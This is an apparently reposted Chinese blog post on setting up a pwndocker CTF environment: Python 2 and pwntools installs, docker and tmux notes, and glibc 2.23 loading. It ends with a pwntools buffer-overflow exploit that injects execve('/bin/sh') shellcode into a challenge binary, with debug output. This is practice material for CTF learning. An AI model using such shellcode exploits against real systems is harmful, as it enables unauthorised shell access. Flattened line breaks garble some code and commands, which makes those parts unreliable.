从零开始配置pwn环境：优化pwndocker配置-编程知识

1.研究背景

从零开始配置kali2023环境：配置pwn调试环境-CSDN博客

前期安装好pwndocker后发现不好用，所以通过研究修改一些配置后可以满足解题需要

2.遇到的问题并解决

1.docker环境pwndocker里面没有python2环境，pwn的题目解答很多需要python2的环境，需要补充完善

docker环境pwndocker里面安装python2环境

                                                                             ┌──(holyeyes┌──(holyeyes㉿kali2023)-[~/Re]
└─$ cd 2 ┌──(holyeyes㉿kali2023)-[~/Re/2]
└─$ sudo docker exec -it pwn_test /bin/bash
[sudo] password for holyeyes: 
root@446f4b4dbc7d:/ctf/work# ls
2  wdb_2018_2nd_easyfmt
root@446f4b4dbc7d:/ctf/work# python2 get-pip.pyroot@446f4b4dbc7d:/ctf/work#  curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.py% Total    % Received % Xferd  Average Speed   Time    Time     Time  CurrentDload  Upload   Total   Spent    Left  Speed0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--       6 1863k    6  127k    0     0   182k      0  0:00:10 --:--:--  0:00:10  181 90 1863k   90 1694k    0     0   996k      0  0:00:01  0:00:01 --:--:--  996100 1863k  100 1863k    0     0  1026k      0  0:00:01  0:00:01 --:--:-- 1026k
root@446f4b4dbc7d:/ctf/work# ls
2  get-pip.py  wdb_2018_2nd_easyfmt
root@446f4b4dbc7d:/ctf/work# python2 get-pip.pyDEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality.                                                                            
Looking in indexes: http://pypi.tuna.tsinghua.edu.cn/simple
Collecting pip<21.0Downloading https://pypi.tuna.tsinghua.edu.cn/packages/27/79/8a850fe3496446ff0d584327ae44e7500daf6764ca1a382d2d02789accf7/pip-20.3.4-py2.py3-none-any.whl (1.5 MB)|████████████████████████████████| 1.5 MB 1.2 MB/s 
Collecting setuptools<45Downloading https://pypi.tuna.tsinghua.edu.cn/packages/e1/b7/182161210a13158cd3ccc41ee19aadef54496b74f2817cc147006ec932b4/setuptools-44.1.1-py2.py3-none-any.whl (583 kB)|████████████████████████████████| 583 kB 37.3 MB/s 
Collecting wheelDownloading https://pypi.tuna.tsinghua.edu.cn/packages/27/d6/003e593296a85fd6ed616ed962795b2f87709c3eee2bca4f6d0fe55c6d00/wheel-0.37.1-py2.py3-none-any.whl (35 kB)
Installing collected packages: pip, setuptools, wheel
Successfully installed pip-20.3.4 setuptools-44.1.1 wheel-0.37.1
root@446f4b4dbc7d:/ctf/work# sudo apt install python2-pip
bash: sudo: command not found
root@446f4b4dbc7d:/ctf/work# apt install python2-pip
Reading package lists... Done
Building dependency tree       
Reading state information... Done
E: Unable to locate package python2-pip
root@446f4b4dbc7d:/ctf/work# apt-get install python-dev
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Note, selecting 'python-dev-is-python2' instead of 'python-dev'
The following additional packages will be installed:libpython2-dev libpython2.7 libpython2.7-dev python-is-python2python2-dev python2.7-dev
The following NEW packages will be installed:libpython2-dev libpython2.7 libpython2.7-dev python-dev-is-python2python-is-python2 python2-dev python2.7-dev
0 upgraded, 7 newly installed, 0 to remove and 89 not upgraded.
Need to get 3,809 kB of archives.
After this operation, 17.7 MB of additional disk space will be used.
Do you want to continue? [Y/n] 
Get:1 http://archive.ubuntu.com/ubuntu focal-updates/universe amd64 libpython2.7 amd64 2.7.18-1~20.04.3 [1,037 kB]
Get:2 http://archive.ubuntu.com/ubuntu focal-updates/universe amd64 libpython2.7-dev amd64 2.7.18-1~20.04.3 [2,466 kB]
Get:3 http://archive.ubuntu.com/ubuntu focal/universe amd64 libpython2-dev amd64 2.7.17-2ubuntu4 [7,140 B]
Get:4 http://archive.ubuntu.com/ubuntu focal/universe amd64 python-is-python2 all 2.7.17-4 [2,496 B]
Get:5 http://archive.ubuntu.com/ubuntu focal-updates/universe amd64 python2.7-dev amd64 2.7.18-1~20.04.3 [293 kB]
Get:6 http://archive.ubuntu.com/ubuntu focal/universe amd64 python2-dev amd64 2.7.17-2ubuntu4 [1,268 B]
Get:7 http://archive.ubuntu.com/ubuntu focal/universe amd64 python-dev-is-python2 all 2.7.17-4 [1,396 B]
Fetched 3,809 kB in 4s (862 kB/s)           
Selecting previously unselected package libpython2.7:amd64.
(Reading database ... 56821 files and directories currently installed.)
Preparing to unpack .../0-libpython2.7_2.7.18-1~20.04.3_amd64.deb ...
Unpacking libpython2.7:amd64 (2.7.18-1~20.04.3) ...
Selecting previously unselected package libpython2.7-dev:amd64.
Preparing to unpack .../1-libpython2.7-dev_2.7.18-1~20.04.3_amd64.deb ...
Unpacking libpython2.7-dev:amd64 (2.7.18-1~20.04.3) ...
Selecting previously unselected package libpython2-dev:amd64.
Preparing to unpack .../2-libpython2-dev_2.7.17-2ubuntu4_amd64.deb ...
Unpacking libpython2-dev:amd64 (2.7.17-2ubuntu4) ...
Selecting previously unselected package python-is-python2.
Preparing to unpack .../3-python-is-python2_2.7.17-4_all.deb ...
Unpacking python-is-python2 (2.7.17-4) ...
Selecting previously unselected package python2.7-dev.
Preparing to unpack .../4-python2.7-dev_2.7.18-1~20.04.3_amd64.deb ...
Unpacking python2.7-dev (2.7.18-1~20.04.3) ...
Selecting previously unselected package python2-dev.
Preparing to unpack .../5-python2-dev_2.7.17-2ubuntu4_amd64.deb ...
Unpacking python2-dev (2.7.17-2ubuntu4) ...
Selecting previously unselected package python-dev-is-python2.
Preparing to unpack .../6-python-dev-is-python2_2.7.17-4_all.deb ...
Unpacking python-dev-is-python2 (2.7.17-4) ...
Setting up libpython2.7:amd64 (2.7.18-1~20.04.3) ...
Setting up libpython2.7-dev:amd64 (2.7.18-1~20.04.3) ...
Setting up libpython2-dev:amd64 (2.7.17-2ubuntu4) ...
Setting up python-is-python2 (2.7.17-4) ...
Setting up python2.7-dev (2.7.18-1~20.04.3) ...
Setting up python2-dev (2.7.17-2ubuntu4) ...
Setting up python-dev-is-python2 (2.7.17-4) ...
Processing triggers for libc-bin (2.31-0ubuntu9.7) ...
root@446f4b4dbc7d:/ctf/work# pip2 install setuptools
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality.                                                                            
Looking in indexes: http://pypi.tuna.tsinghua.edu.cn/simple
Requirement already satisfied: setuptools in /usr/local/lib/python2.7/dist-packages (44.1.1)
root@446f4b4dbc7d:/ctf/work# pip2 install pwntools
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality.                                                                            
Looking in indexes: http://pypi.tuna.tsinghua.edu.cn/simple
Collecting pwntoolsDownloading https://pypi.tuna.tsinghua.edu.cn/packages/e6/4a/95e9e203abc5945507caf2a9706a4c0478f9fd9fd5b7001cb68cfe1564e7/pwntools-4.11.1-py2.py3-none-any.whl (11.7 MB)|████████████████████████████████| 11.7 MB 897 kB/s 
Collecting psutil>=3.3.0Downloading https://pypi.tuna.tsinghua.edu.cn/packages/cd/ee/d946d0b758120e724d9cdd9607c304ff1eedb9380bf60597c295dc7def6b/psutil-5.9.7-cp27-cp27mu-manylinux2010_x86_64.whl (312 kB)|████████████████████████████████| 312 kB 37.8 MB/s 
Requirement already satisfied: pip>=6.0.8 in /usr/local/lib/python2.7/dist-packages (from pwntools) (20.3.4)
Collecting python-dateutilDownloading https://pypi.tuna.tsinghua.edu.cn/packages/36/7a/87837f39d0296e723bb9b62bbb257d0355c7f6128853c78955f57342a56d/python_dateutil-2.8.2-py2.py3-none-any.whl (247 kB)|████████████████████████████████| 247 kB 46.5 MB/s 
Collecting sortedcontainersDownloading https://pypi.tuna.tsinghua.edu.cn/packages/32/46/9cb0e58b2deb7f82b84065f37f3bffeb12413f947f9388e4cac22c4621ce/sortedcontainers-2.4.0-py2.py3-none-any.whl (29 kB)
Collecting mako>=1.0.0Downloading https://pypi.tuna.tsinghua.edu.cn/packages/b4/4d/e03d08f16ee10e688bde9016bc80af8b78c7f36a8b37c7194da48f72207e/Mako-1.1.6-py2.py3-none-any.whl (75 kB)|████████████████████████████████| 75 kB 3.9 MB/s 
Collecting requests>=2.0Downloading https://pypi.tuna.tsinghua.edu.cn/packages/2d/61/08076519c80041bc0ffa1a8af0cbd3bf3e2b62af10435d269a9d0f40564d/requests-2.27.1-py2.py3-none-any.whl (63 kB)|████████████████████████████████| 63 kB 3.6 MB/s 
Collecting colored-tracebackDownloading https://pypi.tuna.tsinghua.edu.cn/packages/68/95/d9b20efe099fff830502c6c7b83da4f1cdfd3346922d87da9bca3e63f897/colored_traceback-0.3.0-py2-none-any.whl (6.7 kB)
Collecting paramiko>=1.15.2Downloading https://pypi.tuna.tsinghua.edu.cn/packages/71/6d/95777fd66507106d2f8f81d005255c237187951644f85a5bd0baeec8a88f/paramiko-2.12.0-py2.py3-none-any.whl (213 kB)|████████████████████████████████| 213 kB 32.2 MB/s 
Collecting six>=1.12.0Downloading https://pypi.tuna.tsinghua.edu.cn/packages/d9/5a/e7c31adbe875f2abbb91bd84cf2dc52d792b5a01506781dbcf25c91daf11/six-1.16.0-py2.py3-none-any.whl (11 kB)
Collecting unicorn>=1.0.2rc1Downloading https://pypi.tuna.tsinghua.edu.cn/packages/32/3d/93adc91f390ac12a96b4d01270421410f1ed054d22e9f716cb0169ae5634/unicorn-2.0.1.post1-py2.py3-none-manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl (16.1 MB)|████████████████████████████████| 16.1 MB 24.7 MB/s 
Collecting ropgadget>=5.3Downloading https://pypi.tuna.tsinghua.edu.cn/packages/a9/59/997946f620e5f402165d0d2f955356e24499bc4d4d5f93b5c04221022681/ROPGadget-7.4-py2-none-any.whl (32 kB)
Collecting capstone>=3.0.5rc2Downloading https://pypi.tuna.tsinghua.edu.cn/packages/7a/fe/e6cdc4ad6e0d9603fa662d1ccba6301c0cb762a1c90a42c7146a538c24e9/capstone-5.0.1.tar.gz (2.9 MB)|████████████████████████████████| 2.9 MB 23.4 MB/s 
Collecting intervaltree>=3.0Downloading https://pypi.tuna.tsinghua.edu.cn/packages/50/fb/396d568039d21344639db96d940d40eb62befe704ef849b27949ded5c3bb/intervaltree-3.1.0.tar.gz (32 kB)
Collecting pyelftools<0.30,>=0.24; python_version < "3"Downloading https://pypi.tuna.tsinghua.edu.cn/packages/04/7c/867630e6e6293793f838b31034aa1875e1c3bd8c1ec34a0929a2506f350c/pyelftools-0.29-py2.py3-none-any.whl (174 kB)|████████████████████████████████| 174 kB 15.3 MB/s 
Collecting pathlib2; python_version < "3.4"Downloading https://pypi.tuna.tsinghua.edu.cn/packages/09/eb/4af4bcd5b8731366b676192675221c5324394a580dfae469d498313b5c4a/pathlib2-2.3.7.post1-py2.py3-none-any.whl (18 kB)
Collecting pysocksDownloading https://pypi.tuna.tsinghua.edu.cn/packages/a2/4b/52123768624ae28d84c97515dd96c9958888e8c2d8f122074e31e2be878c/PySocks-1.7.1-py27-none-any.whl (16 kB)
Collecting rpycDownloading https://pypi.tuna.tsinghua.edu.cn/packages/36/a7/7898de583e17202ce02ac7ecffdbed95c72a6cebe468c1ee6fc94fc20933/rpyc-4.1.5-py2-none-any.whl (68 kB)|████████████████████████████████| 68 kB 11.8 MB/s 
Collecting pyserial>=2.7Downloading https://pypi.tuna.tsinghua.edu.cn/packages/07/bc/587a445451b253b285629263eb51c2d8e9bcea4fc97826266d186f96f558/pyserial-3.5-py2.py3-none-any.whl (90 kB)|████████████████████████████████| 90 kB 15.6 MB/s 
Collecting packagingDownloading https://pypi.tuna.tsinghua.edu.cn/packages/3e/89/7ea760b4daa42653ece2380531c90f64788d979110a2ab51049d92f408af/packaging-20.9-py2.py3-none-any.whl (40 kB)|████████████████████████████████| 40 kB 8.8 MB/s 
Collecting pygments>=2.0Downloading https://pypi.tuna.tsinghua.edu.cn/packages/be/39/32da3184734730c0e4d3fa3b2b5872104668ad6dc1b5a73d8e477e5fe967/Pygments-2.5.2-py2.py3-none-any.whl (896 kB)|████████████████████████████████| 896 kB 18.5 MB/s 
Collecting MarkupSafe>=0.9.2Downloading https://pypi.tuna.tsinghua.edu.cn/packages/fb/40/f3adb7cf24a8012813c5edb20329eb22d5d8e2a0ecf73d21d6b85865da11/MarkupSafe-1.1.1-cp27-cp27mu-manylinux1_x86_64.whl (24 kB)
Collecting idna<3,>=2.5; python_version < "3"Downloading https://pypi.tuna.tsinghua.edu.cn/packages/a2/38/928ddce2273eaa564f6f50de919327bf3a00f091b5baba8dfa9460f3a8a8/idna-2.10-py2.py3-none-any.whl (58 kB)|████████████████████████████████| 58 kB 11.4 MB/s 
Collecting certifi>=2017.4.17Downloading https://pypi.tuna.tsinghua.edu.cn/packages/37/45/946c02767aabb873146011e665728b680884cd8fe70dde973c640e45b775/certifi-2021.10.8-py2.py3-none-any.whl (149 kB)|████████████████████████████████| 149 kB 45.9 MB/s 
Collecting chardet<5,>=3.0.2; python_version < "3"Downloading https://pypi.tuna.tsinghua.edu.cn/packages/19/c7/fa589626997dd07bd87d9269342ccb74b1720384a4d739a1872bd84fbe68/chardet-4.0.0-py2.py3-none-any.whl (178 kB)|████████████████████████████████| 178 kB 46.6 MB/s 
Collecting urllib3<1.27,>=1.21.1Downloading https://pypi.tuna.tsinghua.edu.cn/packages/b0/53/aa91e163dcfd1e5b82d8a890ecf13314e3e149c05270cc644581f77f17fd/urllib3-1.26.18-py2.py3-none-any.whl (143 kB)|████████████████████████████████| 143 kB 28.5 MB/s 
Collecting pynacl>=1.0.1Downloading https://pypi.tuna.tsinghua.edu.cn/packages/de/63/bb36279da38df643c6df3a8a389f29a6ff4a8854468f4c9b9d925b27d57d/PyNaCl-1.4.0-cp27-cp27mu-manylinux1_x86_64.whl (964 kB)|████████████████████████████████| 964 kB 26.7 MB/s 
Collecting bcrypt>=3.1.3Downloading https://pypi.tuna.tsinghua.edu.cn/packages/ad/36/9a0227d048e98409f012570f7bef8a8c2373b9c9c5dfbf82963cbae05ede/bcrypt-3.1.7-cp27-cp27mu-manylinux1_x86_64.whl (59 kB)|████████████████████████████████| 59 kB 8.9 MB/s 
Collecting cryptography>=2.5Downloading https://pypi.tuna.tsinghua.edu.cn/packages/bf/a0/c630e9e3b7e7ea2492db1ca47ef7f741ef1a09f19c6642ef1a16ce996d9b/cryptography-3.3.2-cp27-cp27mu-manylinux2010_x86_64.whl (2.6 MB)|████████████████████████████████| 2.6 MB 22.1 MB/s 
Collecting scandir; python_version < "3.5"Downloading https://pypi.tuna.tsinghua.edu.cn/packages/df/f5/9c052db7bd54d0cbf1bc0bb6554362bba1012d03e5888950a4f5c5dadc4e/scandir-1.10.0.tar.gz (33 kB)
Collecting typing; python_version < "3.5"Downloading https://pypi.tuna.tsinghua.edu.cn/packages/0b/cb/da856e81731833b94da70a08712f658416266a5fb2a9d9e426c8061becef/typing-3.10.0.0-py2-none-any.whl (26 kB)
Collecting plumbumDownloading https://pypi.tuna.tsinghua.edu.cn/packages/f5/7f/4e93e5e1c13261966ea553cb4368599902e4fbf6f7dcad3ec16695a45718/plumbum-1.7.2-py2.py3-none-any.whl (117 kB)|████████████████████████████████| 117 kB 45.5 MB/s 
Collecting pyparsing>=2.0.2Downloading https://pypi.tuna.tsinghua.edu.cn/packages/8a/bb/488841f56197b13700afd5658fc279a2025a39e22449b7cf29864669b15d/pyparsing-2.4.7-py2.py3-none-any.whl (67 kB)|████████████████████████████████| 67 kB 9.4 MB/s 
Collecting cffi>=1.4.1Downloading https://pypi.tuna.tsinghua.edu.cn/packages/a4/42/54bdf22cf6c8f95113af645d0bd7be7f9358ea5c2d57d634bb11c6b4d0b2/cffi-1.15.1-cp27-cp27mu-manylinux1_x86_64.whl (390 kB)|████████████████████████████████| 390 kB 27.5 MB/s 
Collecting enum34; python_version < "3"Downloading https://pypi.tuna.tsinghua.edu.cn/packages/6f/2c/a9386903ece2ea85e9807e0e062174dc26fdce8b05f216d00491be29fad5/enum34-1.1.10-py2-none-any.whl (11 kB)
Collecting ipaddress; python_version < "3"Downloading https://pypi.tuna.tsinghua.edu.cn/packages/c2/f8/49697181b1651d8347d24c095ce46c7346c37335ddc7d255833e7cde674d/ipaddress-1.0.23-py2.py3-none-any.whl (18 kB)
Collecting pycparserDownloading https://pypi.tuna.tsinghua.edu.cn/packages/62/d5/5f610ebe421e85889f2e55e33b7f9a6795bd982198517d912eb1c76e1a53/pycparser-2.21-py2.py3-none-any.whl (118 kB)|████████████████████████████████| 118 kB 40.4 MB/s 
Building wheels for collected packages: capstone, intervaltree, scandirBuilding wheel for capstone (setup.py) ... doneCreated wheel for capstone: filename=capstone-5.0.1-py2-none-manylinux1_x86_64.whl size=2933815 sha256=17d9f762956464878ba6ba16c0c3cf14d31cd2dda65773daa32340321631014bStored in directory: /root/.cache/pip/wheels/30/d5/0e/284d552f462834b854509c0d15597b69dca3d95f68db330d0fBuilding wheel for intervaltree (setup.py) ... doneCreated wheel for intervaltree: filename=intervaltree-3.1.0-py2.py3-none-any.whl size=26103 sha256=da488f680c7f6b388c2551e34f2167f9f18476387d6b7a3443b97f2a11e84fc3Stored in directory: /root/.cache/pip/wheels/c3/b7/91/90ec6643bcb930bfd8079718cfb5763283af00a9726463dd1dBuilding wheel for scandir (setup.py) ... doneCreated wheel for scandir: filename=scandir-1.10.0-cp27-cp27mu-linux_x86_64.whl size=34188 sha256=3d6a2c1d10c9e05c8e2273bb0e7c3843371c8d2582c32211d66f0a2872dcdbe6Stored in directory: /root/.cache/pip/wheels/94/dc/52/ea6c1d7960b7267b32bc59b3625afb5840bd86ddbf18d7f1cf
Successfully built capstone intervaltree scandir
Installing collected packages: psutil, six, python-dateutil, sortedcontainers, MarkupSafe, mako, idna, certifi, chardet, urllib3, requests, pygments, colored-traceback, pycparser, cffi, pynacl, bcrypt, enum34, ipaddress, cryptography, paramiko, unicorn, capstone, ropgadget, intervaltree, pyelftools, scandir, typing, pathlib2, pysocks, plumbum, rpyc, pyserial, pyparsing, packaging, pwntools
Successfully installed MarkupSafe-1.1.1 bcrypt-3.1.7 capstone-5.0.1 certifi-2021.10.8 cffi-1.15.1 chardet-4.0.0 colored-traceback-0.3.0 cryptography-3.3.2 enum34-1.1.10 idna-2.10 intervaltree-3.1.0 ipaddress-1.0.23 mako-1.1.6 packaging-20.9 paramiko-2.12.0 pathlib2-2.3.7.post1 plumbum-1.7.2 psutil-5.9.7 pwntools-4.11.1 pycparser-2.21 pyelftools-0.29 pygments-2.5.2 pynacl-1.4.0 pyparsing-2.4.7 pyserial-3.5 pysocks-1.7.1 python-dateutil-2.8.2 requests-2.27.1 ropgadget-7.4 rpyc-4.1.5 scandir-1.10.0 six-1.16.0 sortedcontainers-2.4.0 typing-3.10.0.0 unicorn-2.0.1.post1 urllib3-1.26.18

保存安装好的pwndocker环境为镜像

┌──(holyeyes㉿kali2023)-[~]
└─$  sudo docker  ps 
[sudo] password for holyeyes: 
CONTAINER ID   IMAGE                COMMAND           CREATED       STATUS       PORTS                                           NAMES
446f4b4dbc7d   skysider/pwndocker   "/sbin/my_init"   7 hours ago   Up 7 hours   0.0.0.0:23946->23946/tcp, :::23946->23946/tcp   pwn_test┌──(holyeyes㉿kali2023)-[~]
└─$ sudo docker commit 446f4b4dbc7d pwn_test:v1┌──(holyeyes㉿kali2023)-[~]
└─$ sudo docker image ls                         
REPOSITORY             TAG       IMAGE ID       CREATED        SIZE
pwn_test               v1        202c1a800e25   5 hours ago    5.25GB
skysider/pwndocker     latest    26c0315bd8d9   2 months ago   5GB
keen4n/pwndocker1604   latest    4ff3687f7371   4 years ago    2.52GB

更新docker-compose.yml

version: '3'
services:pwn:container_name: pwn_test1604image: pwn_testsecurity_opt:- seccomp:unconfinedcap_add:- SYS_PTRACEports:- "23947:23947"volumes:- /home/holyeyes/Re:/ctf/work

更新run.sh

docker-compose up -d
docker exec -it pwn_test1604 /bin/bash

──(holyeyes㉿kali2023)-[~/pwndocker1604]
└─$ sudo ./run.sh
[sudo] password for holyeyes:
Pulling pwn (pwn_test:)...
ERROR: The image for the service you're trying to recreate has been removed. If you continue, volume data could be lost. Consider backing up your data before continuing.

Continue with the new image? [yN]

但上述实验失败了，只能用其他方法保存环境了

2.tmux环境配置不生效

左右分屏 ctrl+B+%

上下分屏ctrl+B+”

激活鼠标ctrl+B+：set -g mouse on

搞半天都不行，原来是在虚机中ctrl换成alt，即：

左右分屏 alt+B+%

上下分屏alt+B+”

激活鼠标alt+B+：set --g mouse on

3.docker默认的libc环境是20.04，需要换成16.04

from pwn import *

p = process(["/glibc/2.23/64/lib/ld-2.23.so", "./test"], env={"LD_PRELOAD":"/glibc/2.23/64/lib/libc.so.6"})

参考pwndocker的使用说明https://github.com/skysider/pwndocker

included glibc
Default compiled glibc path is /glibc.2.19 —— ubuntu 12.04 default libc version
2.23 —— ubuntu 16.04 default libc version
2.24 —— introduce vtable check in file struct
2.27 —— ubuntu 18.04 default glibc version
2.31 —— ubuntu 20.04 default glibc version(built-in)
2.282.30,2.332.36 —— latest libc versions
Q&A
How to run in custom libc version?
cp /glibc/2.27/64/lib/ld-2.27.so /tmp/ld-2.27.so
patchelf --set-interpreter /tmp/ld-2.27.so ./test
LD_PRELOAD=./libc.so.6 ./test
orfrom pwn import *
p = process(["/path/to/ld.so", "./test"], env={"LD_PRELOAD":"/path/to/libc.so.6"})

编写了一个pwn脚本进行测试

from pwn import *p = process(["/glibc/2.23/64/lib/ld-2.23.so", "./test"], env={"LD_PRELOAD":"/glibc/2.23/64/lib/libc.so.6"})p = process('./wdb_2018_3rd_soEasy')
#p = remote('node5.buuoj.cn',27285)
context.log_level='debug'
context.arch='i386'p.recvuntil('->')
buf = int(p.recvuntil('\n', drop=True),16)
log.info('buf:'+hex(buf))p.recvuntil('what do you want to do?')shellcode = asm(shellcraft.sh())
print len(shellcode)pl = ''
pl += shellcode
pl += (76-len(pl))*'a'
pl += p32(buf)p.sendline(pl)p.interactive()

┌──(holyeyes㉿kali2023)-[~]
└─$ sudo docker exec -it pwn_test /bin/bash
[sudo] password for holyeyes: 
root@446f4b4dbc7d:/ctf/work# cd 2
root@446f4b4dbc7d:/ctf/work/2# ls
exp.py  get-pip.py  wdb_2018_3rd_soEasy
root@446f4b4dbc7d:/ctf/work/2# python2 exp.py 
[+] Starting local process '/glibc/2.23/64/lib/ld-2.23.so': pid 1051
[+] Starting local process './wdb_2018_3rd_soEasy': pid 1053
[DEBUG] Received 0x38 bytes:'Hei,give you a gift->0xffeaf870\n''what do you want to do?\n'
[*] buf:0xffeaf870
[DEBUG] cpp -C -nostdinc -undef -P -I/usr/local/lib/python2.7/dist-packages/pwnlib/data/includes /dev/stdin
[DEBUG] Assembling.section .shellcode,"awx".global _start.global __start_start:__start:.intel_syntax noprefix.p2align 0/* execve(path='/bin///sh', argv=['sh'], envp=0) *//* push '/bin///sh\x00' */push 0x68push 0x732f2f2fpush 0x6e69622fmov ebx, esp/* push argument array ['sh\x00'] *//* push 'sh\x00\x00' */push 0x1010101xor dword ptr [esp], 0x1016972xor ecx, ecxpush ecx /* null terminate */push 4pop ecxadd ecx, esppush ecx /* 'sh\x00' */mov ecx, espxor edx, edx/* call execve() */push 11 /* 0xb */pop eaxint 0x80
[DEBUG] /usr/bin/x86_64-linux-gnu-as -32 -o /tmp/pwn-asm-sp9wDe/step2 /tmp/pwn-asm-sp9wDe/step1
[DEBUG] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-sp9wDe/step3 /tmp/pwn-asm-sp9wDe/step4
44
[DEBUG] Sent 0x51 bytes:00000000  6a 68 68 2f  2f 2f 73 68  2f 62 69 6e  89 e3 68 01  │jhh/│//sh│/bin│··h·│00000010  01 01 01 81  34 24 72 69  01 01 31 c9  51 6a 04 59  │····│4$ri│··1·│Qj·Y│00000020  01 e1 51 89  e1 31 d2 6a  0b 58 cd 80  61 61 61 61  │··Q·│·1·j│·X··│aaaa│00000030  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│00000040  61 61 61 61  61 61 61 61  61 61 61 61  70 f8 ea ff  │aaaa│aaaa│aaaa│p···│00000050  0a                                                  │·│00000051
[*] Switching to interactive mode$